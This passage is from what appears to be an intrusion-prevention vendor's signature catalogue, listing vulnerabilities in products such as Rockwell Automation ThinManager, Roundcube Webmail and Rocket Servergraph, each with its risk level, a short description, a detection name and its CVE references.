HTTP_CSU-RichFaces-Framework-DATA-URL-Segment-With-Compressed-Content
HTTP_CSU-RichFaces-Framework-Expression-Language-Injection-Known-Payload

References:

CVE-2018-14667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14667

RKD-Software-BarCodeAx.dll-Buffer-Overflow

About this vulnerability:

An RKD Software BarCodeAx.dll Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-732-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

RKD Software

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in RKD Software, in BarCodeAx.dll, version 4.9, which allows remote attackers to execute arbitrary code via a long BeginPrint argument.

Situation:

File-Text_RKD-Software-BarCodeAx.dll-Buffer-Overflow

References:

CVE-2007-3435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3435

BID-24596
http://www.securityfocus.com/bid/24596

OSVDB-37482
http://www.osvdb.org/37482

Rlpr-Msg-Format-Strings-Vulnerability

About this vulnerability:

Remotely exploitable format strings vulnerability

Risk:

High

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

rlpr

Type:

Format String

Description:

Format strings vulnerability in the rlprd daemon allows a remote attacker to execute arbitrary code on the target server. This can lead to a remote compromise of the server.

Situation:

Generic_Rlpr-Format-Strings-Attack

References:

CVE-2004-0393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0393

BID-10578
http://www.securityfocus.com/bid/10578

Rocket-Chat-Pre-Auth-Blind-NoSQL-Injection

About this vulnerability:

A vulnerability in Rocket Chat

Risk:

Moderate

First detected in:

sgpkg-ips-1838-5242

Last changed:

sgpkg-ips-1838-5242

Platform:

Generic

Software:

Rocket Chat

Type:

Input Validation

Description:

Improper input validation in the password reset function causes a noSQL injection vulnerability in Rocket Chat. A successful Rocket Chat Pre-Auth Blind NoSQL Injection

Situation:

HTTP_CRL-Rocket-Chat-Pre-Auth-Blind-NoSQL-Injection

References:

CVE-2021-22911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911

Rocket-Servergraph-Admin-Center-Filerequestor-Del-Directory-Traversal

About this vulnerability:

A vulnerability in Rocket software Servergraph Admin Center for TSM

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rocket software Servergraph Admin Center for TSM

Type:

Directory Traversal

Description:

A denial of service vulnerability exists in Rocket Servergraph, an interface for monitoring backup solutions such as IBM Tivoli Storage Manager, Symantec NetBackup etc. The vulnerability is due to a directory traversal when handling requests to the URI's fileRequestor. A remote unauthenticated attacker can exploit the vulnerability to delete files on the target server.

Situation:

HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Del-Directory-Traversal

References:

CVE-2014-3914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3914

OSVDB-107677
http://www.osvdb.org/107677

Rocket-Servergraph-Admin-Center-Filerequestor-Directory-Traversal

About this vulnerability:

A vulnerability in Rocket software Servergraph Admin Center for TSM

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rocket software Servergraph Admin Center for TSM

Type:

Directory Traversal

Description:

A code execution vulnerability exists in Rocket Servergraph Admin Center for TSM, an interface for monitoring backup solutions such as IBM Tivoli Storage Manager, Symantec NetBackup etc. The vulnerability is due to a directory traversal within the fileRequestServlet servlet. A remote unauthenticated attacker can exploit this vulnerability to achieve arbitrary code execution under the context of the SYSTEM user.

Situation:

HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Directory-Traversal

References:

CVE-2014-3914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3914

OSVDB-107680
http://www.osvdb.org/107680

Rocket-Servergraph-Admin-Center-Filerequestor-Run-And-Runclear-Vulnerability

About this vulnerability:

A vulnerability in Rocket software Servergraph Admin Center for TSM

Risk:

High

First detected in:

sgpkg-ips-596-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rocket software Servergraph Admin Center for TSM

Type:

Directory Traversal

Description:

Multiple vulnerabilities exist in Rocket Servergraph, an interface for monitoring backup solutions such as IBM Tivoli Storage Manager, Symantec NetBackup etc. These vulnerabilities are due to input validation errors when handling requests to the URIs fileRequestor. A remote unauthenticated attacker can exploit these vulnerabilities to achieve arbitrary command execution under the context of the SYSTEM user.

Situation:

HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Run-And-Runclear-Vulnerability

References:

CVE-2014-3914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3914

OSVDB-107679
http://www.osvdb.org/107679

Rocket-Servergraph-Admin-Center-Userrequest-And-Tsmrequest-Command-Execution

About this vulnerability:

A vulnerability in Rocket software Servergraph Admin Center for TSM

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rocket software Servergraph Admin Center for TSM

Type:

Input Validation

Description:

Multiple vulnerabilities exist in Rocket Servergraph, an interface for monitoring backup solutions such as IBM Tivoli Storage Manager, Symantec NetBackup etc. These vulnerabilities are due to input validation errors when handling requests to the URIs userRequest and tsmRequest. A remote unauthenticated attacker can exploit these vulnerabilities to achieve arbitrary command execution under the context of the SYSTEM user.

Situation:

HTTP_CRL-Rocket-Servergraph-Admin-Center-Userrequest-And-Tsmrequest-Command-Execution

References:

CVE-2014-3915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3915

BID-67780
http://www.securityfocus.com/bid/67780

OSVDB-107681
http://www.osvdb.org/107681

Rockwell-Automation-CCW-ccwsln-External-Entity-Injection

About this vulnerability:

A vulnerability in Rockwell Automation Connected Components Workbench.

Risk:

High

First detected in:

sgpkg-ips-1504-5242

Last changed:

sgpkg-ips-1504-5242

Platform:

Generic

Software:

Rockwell Automation Connected Components Workbench

Type:

Input Validation

Description:

A vulnerability in Rockwell Automation Connected Components Workbench, versions v12.00 and prior, which allows remote attackers to disclose file contents for any file readable by the user running the application by enticing the victims to open a malicious link or file, due to a failure on part of the application to properly parse XML files.

Situation:

File-TextId_Rockwell-Automation-CCW-ccwsln-External-Entity-Injection

References:

CVE-2022-1018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1018

Rockwell-Automation-Factorytalk-Rnadiagnosticssrv-Insecure-Deserialization

About this vulnerability:

A vulnerability in Rockwell Automation FactoryTalk Diagnostics

Risk:

Moderate

First detected in:

sgpkg-ips-1250-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rockwell Automation FactoryTalk Diagnostics

Type:

Input Validation

Description:

Insecure deserialization of data sent to the RNADiagnosticsSrv endpoint of Rockwell Automation FactoryTalk Diagnostics causes a vulnerability that can be exploited to gain the ability to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Rockwell-Automation-Factorytalk-Rnadiagnosticssrv-Insecure-Deserialization

References:

CVE-2020-6967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6967

Rockwell-Automation-Factorytalk-SE-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Rockwell FactoryTalk View SE

Risk:

High

First detected in:

sgpkg-ips-1342-5242

Last changed:

sgpkg-ips-1342-5242

Platform:

Generic

Software:

Rockwell FactoryTalk View SE

Type:

Input Validation

Description:

There exists a vulberability in Rockwell FactoryTalk View SE SCADA which allows unathenticated users to gain sensitive information by project copy requests, modify or create critical files via directory traversal, and to create a race condition to trigger code execution.

Situation:

HTTP_CSU-Rockwell-Automation-Factorytalk-SE-RCE

References:

CVE-2020-12029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12029

Rockwell-Automation-ISaGRAF-Workbench-7-ZIP-Directory-Traversal

About this vulnerability:

A vulnerability in Rockwell Automation ISaGRAF Workbench.

Risk:

High

First detected in:

sgpkg-ips-1494-5242

Last changed:

sgpkg-ips-1494-5242

Platform:

Generic

Software:

Rockwell Automation ISaGRAF Workbench

Type:

Directory Traversal

Description:

A vulnerability in Rockwell Automation ISaGRAF Workbench, versions v6.0 - v6.6.9, which allows remote attackers to execute arbitrary code by enticing the user to open a crafted exchange file, due to a lack of proper input validation of names of files included in 7-ZIP files opened by the program.

Situation:

File-Binary_Rockwell-Automation-ISaGRAF-Workbench-7-ZIP-Directory-Traversal

References:

CVE-2022-2463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2463

Rockwell-Automation-Micrologix-PLC-Default-Credentials-CVE-2016-5645

About this vulnerability:

A vulnerability in Rockwell Automation MicroLogix PLC

Risk:

High

First detected in:

sgpkg-ips-1866-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

Rockwell Automation MicroLogix PLC

Type:

Backdoor

Description:

Various Rockwell Automation MicroLogix PLC products use a hardcoded SNMP community string for applying firmware updates. A remote attacker can use this to load arbitrary firmware on the device.

Situation:

SNMP-UDP_Rockwell-Automation-Micrologix-PLC-Default-Community-String-Usage

References:

CVE-2016-5645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5645

Rockwell-Automation-Rslinx-Classic-Cip-Sendrrdata-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Rockwell Automation RSLinx Classic

Risk:

Moderate

First detected in:

sgpkg-ips-1127-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rockwell Automation RSLinx Classic

Type:

Buffer Overflow

Description:

Improper parsing of EtherNet/IP SendRRData messages causes a heap buffer overflow vulnerability in Rockwell Automation RSLinx Classic. A successful exploit allows an attacker to crash the target system or possibly code execution.

Situation:

Generic_CS-Rockwell-Automation-Rslinx-Classic-Cip-Sendrrdata-Heap-Buffer-Overflow

References:

CVE-2018-14821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14821

Rockwell-Automation-Rslinx-Classic-Forward-Open-Electronic-Key-Stack-BOF

About this vulnerability:

A vulnerability in Rockwell Automation RSLinx Classic

Risk:

Moderate

First detected in:

sgpkg-ips-1144-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rockwell Automation RSLinx Classic

Type:

Buffer Overflow

Description:

Improper handling of CIP SendRRData messages with overly large size field within the Electronic Key segment in the Connection Path causes a stack buffer overflow vulnerability in Rockwell Automation RSLinx Classic. A successful exploit can crash the target application.

Situation:

Generic_CS-Rockwell-Automation-Rslinx-Classic-Forward-Open-Electronic-Key-Stack-Buffer-Overflow

References:

CVE-2019-6553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6553

Rockwell-Automation-Rslinx-Ethernet-IP-SendUnitData-DoS

About this vulnerability:

A vulnerability in Rockwell Automation RSLinx Classic.

Risk:

High

First detected in:

sgpkg-ips-1363-5242

Last changed:

sgpkg-ips-1363-5242

Platform:

Generic

Software:

Rockwell Automation RSLinx Classic

Type:

Input Validation

Description:

A vulnerability in Rockwell Automation RSLinx Classic, versions 4.12.00 and before, which allows remote attackers to cause a denial of service condition by sending specially crafted packets to the vulnerable server.

Situation:

Generic_CS-Rockwell-Automation-Rslinx-Ethernet-IP-SendUnitData-DoS

References:

CVE-2020-13573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13573

Rockwell-Automation-RSLogix-5000-RsvcHost.exe-Denial-Of-Service

About this vulnerability:

A vulnerability in Rockwell Automation RSLogix 5000

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Rockwell Automation RSLogix 5000

Type:

Buffer Overflow

Description:

There is a denial of service vulnerability in RSLogix 5000. An attacker can cause a restart by sending a crafted rna packet.

Situation:

Generic_CS-Rockwell-Automation-RSLogix-5000-RsvcHost.exe-Denial-Of-Service

References:

CVE-2011-3489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3489

BID-49608
http://www.securityfocus.com/bid/49608

Rockwell-Automation-Thinmanager-CVE-2023-27855-Directory-Traversal

About this vulnerability:

A vulnerability in Rockwell Automation ThinManager ThinServer

Risk:

High

First detected in:

sgpkg-ips-1581-5242

Last changed:

sgpkg-ips-1581-5242

Platform:

Generic

Software:

Rockwell Automation ThinManager ThinServer

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Rockwell Automation ThinManager. The vulnerability is due to improper validation of user data in the ThinServer component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of SYSTEM.

Situation:

Generic_CS-Rockwell-Automation-Thinmanager-CVE-2023-27855-Directory-Traversal

References:

CVE-2023-27855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27855

Rockwell-Automation-Thinmanager-Denial-Of-Service-CVE-2023-27857

About this vulnerability:

A vulnerability in Rockwell Automation ThinManager ThinServer

Risk:

High

First detected in:

sgpkg-ips-1652-5242

Last changed:

sgpkg-ips-1652-5242

Platform:

Generic

Software:

Rockwell Automation ThinManager ThinServer

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Rockwell Automation ThinManager ThinServer can allow an unauthenticated attacker to crash ThinServer.exe with a crafted Type 7 message.

Situation:

Generic_CS-Rockwell-Automation-Thinmanager-Denial-Of-Service-CVE-2023-27857

References:

CVE-2023-27857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27857

Rockwell-Automation-Thinmanager-Thinserver-API-Directory-Traversal

About this vulnerability:

A vulnerability in Rockwell Automation ThinManager ThinServer

Risk:

Moderate

First detected in:

sgpkg-ips-1823-5242

Last changed:

sgpkg-ips-1823-5242

Platform:

Generic

Software:

Rockwell Automation ThinManager ThinServer

Type:

Directory Traversal

Description:

Improper validation of user data when processing a crafted POST request causes a directory traversal vulnerability in Rockwell Automation ThinManager ThinServer. A successful exploitation allows an attacker to write files in arbitrary locations and possibly execute code on the target system.

Situation:

HTTP_CRL-Rockwell-Automation-Thinmanager-Thinserver-API-Directory-Traversal

References:

CVE-2024-45826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45826

Rockwell-Automation-Thinmanager-Thinserver-Directory-Traversal

About this vulnerability:

A vulnerability in Rockwell Automation ThinManager ThinServer

Risk:

Moderate

First detected in:

sgpkg-ips-1578-5242

Last changed:

sgpkg-ips-1578-5242

Platform:

Generic

Software:

Rockwell Automation ThinManager ThinServer

Type:

Directory Traversal

Description:

Improper validation of user data in the ThinServer component causes a directory traversal vulnerability in Rockwell Automation ThinManager ThinServer. A successful exploit may allow an attacker to access arbitrary files on the target system.

Situation:

Generic_CS-Rockwell-Automation-Thinmanager-Thinserver-Directory-Traversal

References:

CVE-2023-27856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27856

Rockwell-Automation-Thinmanager-Thinserver-Monitor-Thread-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Rockwell Automation ThinManager ThinServer

Risk:

Moderate

First detected in:

sgpkg-ips-1805-5242

Last changed:

sgpkg-ips-1805-5242

Platform:

Generic

Software:

Rockwell Automation ThinManager ThinServer

Type:

Input Validation

Description:

An input validation flaw when parsing packets containing variable field sizes in the Monitor Thread component causes a denial of service vulnerability in Rockwell Automation ThinManager ThinServer.

Situation:

Generic_CS-Rockwell-Automation-Thinmanager-Thinserver-Monitor-Thread-Out-Of-Bounds-Read

References:

CVE-2024-10387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10387

Rockwell-Automation-Thinmanager-Type-13-Synchronization-Integer-Overflow

About this vulnerability:

A vulnerability in Rockwell Automation ThinManager ThinServer

Risk:

High

First detected in:

sgpkg-ips-1627-5242

Last changed:

sgpkg-ips-1627-5242

Platform:

Generic

Software:

Rockwell Automation ThinManager ThinServer

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported for Rockwell Automation ThinManager ThinServer. This vulnerability is due to improper input validation when handling Type 13 synchronization messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.

Situation:

Generic_CS-Rockwell-Automation-Thinmanager-Type-13-Synchronization-Integer-Overflow

References:

CVE-2023-2914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2914

Rockwell-Automation-Thinmanager-Type-17-Monitor-Missing-Authorization

About this vulnerability:

A vulnerability in Rockwell Automation ThinManager ThinServer

Risk:

High

First detected in:

sgpkg-ips-1812-5242

Last changed:

sgpkg-ips-1812-5242

Platform:

Generic

Software:

Rockwell Automation ThinManager ThinServer

Type:

Malfunction

Description:

A missing authorization vulnerability has been reported in Rockwell Automation ThinManager. The vulnerability is due to a flaw in access control when handling Type 17 messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in execution of arbitrary database queries.

Situation:

Generic_CS-Rockwell-Automation-Thinmanager-Type-17-Monitor-Missing-Authorization

References:

CVE-2024-10386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10386

Rockwell-Automation-Thinmanager-Type-21-Synchronization-Directory-Traversal

About this vulnerability:

A vulnerability in Rockwell Automation ThinManager ThinServer

Risk:

High

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Generic

Software:

Rockwell Automation ThinManager ThinServer

Type:

Directory Traversal

Description:

A denial of service vulnerability has been reported for Rockwell Automation ThinManager ThinServer. This vulnerability is due to a directory traversal in Type 21 messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary deletion of files or, in the worst case, denial of service.

Situation:

Generic_CS-Rockwell-Automation-Thinmanager-Type-21-Synchronization-Directory-Traversal

References:

CVE-2023-2915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2915

Rockwell-Automation-Thinmanager-Type-38-Synchronization-Directory-Traversal

About this vulnerability:

A vulnerability in Rockwell Automation ThinManager ThinServer

Risk:

High

First detected in:

sgpkg-ips-1629-5242

Last changed:

sgpkg-ips-1629-5242

Platform:

Generic

Software:

Rockwell Automation ThinManager ThinServer

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Rockwell Automation ThinManager. The vulnerability is due to improper validation of user data in synchronization type 38 messages that is used in file operations. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in an attacker writing a file to the target server outside of the expected directory, in the worst case, resulting in arbitrary code execution under the security context of the user running the server.

Situation:

Generic_CS-Rockwell-Automation-Thinmanager-Type-38-Synchronization-Directory-Traversal

References:

CVE-2023-2917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2917

Rockwell-Automation-Workbench-CCWARC-Insecure-Deserialization

About this vulnerability:

A vulnerability in Rockwell Automation Connected Components Workbench.

Risk:

High

First detected in:

sgpkg-ips-1501-5242

Last changed:

sgpkg-ips-1501-5242

Platform:

Generic

Software:

Rockwell Automation Connected Components Workbench

Type:

Input Validation

Description:

A vulnerability in Rockwell Automation, Connected Components Workbench v13.00.00 and prior, ISaGRAF Workbench v6.0 though v6.6.9, Safety Instrumented Systems Workstation v1.2 and prior, which allows remote attackers to execute arbitrary code by enticing the victims to open a malicious link or file, due to an input validation error when processing CCWARC files.

Situation:

File-Binary_Rockwell-Automation-Workbench-CCWARC-Insecure-Deserialization

References:

CVE-2022-1118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1118

Rockwell-RSLogix-Heap-Overflow-Vulnerability

About this vulnerability:	A vulnerability in Rockwell RSLogix
Risk:	Moderate
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Rockwell Automation RSLogix 5000
Type:	Buffer Overflow
Description:	A vulnerability in Rockwell RSLogix allows for Denial of Service and potential remote code execution.
Situation:	Generic_CS-Rockwell-RSLogix-Heap-Overflow-Vulnerability

Rompager-Rom0-Information-Disclosure

About this vulnerability:

A vulnerability in Rompager Embedded Webserver

Risk:

High

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Allegro Rompager Web Server

Type:

Insecure Configuration

Description:

There is an information disclosure vulnerability in Allegro Rompager Web Server. As the program is commonly used in many network devices, it may be used for network password, credential and topology information gathering.

Situation:

HTTP_CSU_Rompager-Rom0-Information-Disclosure

References:

CVE-2014-4019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4019

Roundcube-Webmail-Arbitrary-File-Read

About this vulnerability:

An attempt to exploit a vulnerability in Roundcube Webmail detected

Risk:

High

First detected in:

sgpkg-ips-1404-5242

Last changed:

sgpkg-ips-1404-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Malfunction

Description:

An attempt to exploit a post-auth vulnerability in Roundcube Webmail detected.

Situation:

HTTP_CRL-Roundcube-Webmail-Arbitrary-File-Read

References:

CVE-2017-16651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16651

Roundcube-Webmail-Archive-IMAP-Command-Injection

About this vulnerability:

A vulnerability in RoundCube RoundCube Webmail

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Input Validation

Description:

Improper request validation causes a command injection vulnerability in RoundCube Webmail. A successful exploit allows an attacker to send arbitrary IMAP commands.

Situation:

HTTP_CRL-Roundcube-Webmail-Archive-IMAP-Command-Injection

References:

CVE-2018-9846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9846

Roundcube-Webmail-Cascading-Style-Sheets-Filtering-Information-Disclosure

About this vulnerability:

A vulnerability in RoundCube RoundCube Webmail

Risk:

Moderate

First detected in:

sgpkg-ips-1790-5242

Last changed:

sgpkg-ips-1790-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Input Validation

Description:

Insufficient validation and sanitization of Cascading Style Sheets in emails causes an information disclosure vulnerability in RoundCube Webmail.

Situation:

File-Text_Roundcube-Webmail-Cascading-Style-Sheets-Filtering-Information-Disclosure

References:

CVE-2024-42010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42010

Roundcube-Webmail-Cross-Site-Scripting-CVE-2020-35730

About this vulnerability:

An attempt to exploit a vulnerability in RoundCube Webmail detected

Risk:

High

First detected in:

sgpkg-ips-1677-5242

Last changed:

sgpkg-ips-1677-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Input Validation

Description:

A cross-site scripting (XSS) issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16, and 1.4.x before 1.4.10. The attacker can send a plain text e-mail message, with JavaScript in a link reference element that is mishandled by "linkref_addindex" in "rcube_string_replacer.php". The vulnerability could be used to exploit, for example, CVE-2021-44026 SQL injection.

Situation:

File-Text_Roundcube-Webmail-Cross-Site-Scripting-CVE-2020-35730

References:

CVE-2020-35730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35730

Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in RoundCube Webmail

Risk:

High

First detected in:

sgpkg-ips-1661-5242

Last changed:

sgpkg-ips-1661-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Roundcube Webmail. The vulnerability is due to improper validation and sanitization of the incoming email messages by the rcube_washtml::wash_uri() method of rcube_washtml.php. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted email message to a target user. When the user accesses the Roundcube server to view the crafted email, the XSS condition will be triggered. Successful exploitation could result in the execution of script code in security context of the target user's browser.

Situation:

SMTP_CS-Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting
File-TextId_Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting

References:

CVE-2023-5631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5631

Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in RoundCube RoundCube Webmail

Risk:

Moderate

First detected in:

sgpkg-ips-1779-5242

Last changed:

sgpkg-ips-1779-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Input Validation

Description:

Insufficient validation and sanitization of attributes of the body HTML tag causes a cross-site scripting vulnerability in RoundCube Webmail. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

SMTP_CCS-Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting
File-Text_Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting

References:

CVE-2024-42009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42009

Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008

About this vulnerability:

A vulnerability in RoundCube Webmail

Risk:

High

First detected in:

sgpkg-ips-1789-5242

Last changed:

sgpkg-ips-1789-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in Roundcube Webmail. The vulnerability is due to insufficient validation and sanitization of email attachments. A remote, unauthenticated attacker could exploit this vulnerability by sending the victim a crafted email. Successfully exploiting this vulnerability could result in sensitive information disclosure, and code execution in the context of the victim's browser.

Situation:

File-Text_Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008
File-TextId_Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008

References:

CVE-2024-42008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42008

Roundcube-Webmail-Linkref-Cross-Site-Scripting-CVE-2023-43770

About this vulnerability:

A vulnerability in RoundCube Webmail

Risk:

High

First detected in:

sgpkg-ips-1820-5242

Last changed:

sgpkg-ips-1820-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Cross-site Scripting

Description:

A cross site scripting vulnerability has been reported in RoundCube versions before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3. An unauthenticated attacker can exploit this vulnerability by enticing the target user into opening an email with a maliciously crafted link.

Situation:

File-Text_Roundcube-Webmail-Linkref-Cross-Site-Scripting-CVE-2023-43770

References:

CVE-2023-43770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43770

Roundcube-Webmail-RCE-Via-Config-Setting-CVE-2020-12641

About this vulnerability:

An attempt to exploit a vulnerability in RoundCube Webmail detected

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Input Validation

Description:

Roundcube Webmail before 1.4.4 allows attackers to execute arbitrary code via shell metacharacters in a configuration setting for "im_convert_path" or "im_identify_path".

Situation:

HTTP_CRL-Roundcube-Webmail-ECE-Via-Config-Setting-CVE-2020-12641

References:

CVE-2020-12641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12641

Roundcube-Webmail-SQL-Injection-CVE-2021-44026

About this vulnerability:

An attempt to exploit a vulnerability in RoundCube Webmail detected

Risk:

High

First detected in:

sgpkg-ips-1677-5242

Last changed:

sgpkg-ips-1677-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Input Validation

Description:

Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search_params.

Situation:

HTTP_CSU-Roundcube-Webmail-SQL-Injection-CVE-2021-44026

References:

CVE-2021-44026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44026

Roundcube-Webmail-SVG-Animate-Stored-Cross-Site-Scripting

About this vulnerability:

An attempt to exploit a vulnerability in RoundCube Webmail

Risk:

Moderate

First detected in:

sgpkg-ips-1769-5242

Last changed:

sgpkg-ips-1769-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Input Validation

Description:

Insufficient validation and sanitization of the animate HTML tag within an SVG file causes a cross-site scripting vulnerablity in RoundCube webmail. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

File-TextId_Roundcube-Webmail-SVG-Animate-Stored-Cross-Site-Scripting

References:

CVE-2024-37383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37383

Roundcube-Webmail-XML-Attachment-Cross-Site-Scripting-CVE-2020-13965

About this vulnerability:

A vulnerability in RoundCube Webmail

Risk:

High

First detected in:

sgpkg-ips-1816-5242

Last changed:

sgpkg-ips-1816-5242

Platform:

Generic

Software:

RoundCube Webmail

Type:

Cross-site Scripting

Description:

A cross site scripting vulnerability has been reported in the RoundCube Webmail versions before 1.3.12 and 1.4.x before 1.4.5. An unauthenticated attacker can exploit this vulnerability by enticing the target user into previewing maliciously crafted XML content in an email attachment.

Situation:

File-Text_Roundcube-Webmail-XML-Attachment-Cross-Site-Scripting-CVE-2020-13965

References:

CVE-2020-13965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13965

Roxio-CinePlayer-Buffer-Overflow

About this vulnerability:

A Roxio CinePlayer Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-736-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Roxio CinePlayer

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Roxio CinePlayer, version 3.2, which allows remote attackers to execute arbitrary code by setting an overly long value to DiskType.

Situation:

File-Text_Roxio-CinePlayer-Buffer-Overflow

References:

CVE-2007-1559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1559

BID-23412
http://www.securityfocus.com/bid/23412

OSVDB-34779
http://www.osvdb.org/34779

Roxy-WI-Unauthenticated-Command-Injection-RCE

About this vulnerability:

A vulnerability in Roxy-WI.

Risk:

High

First detected in:

sgpkg-ips-1499-5242

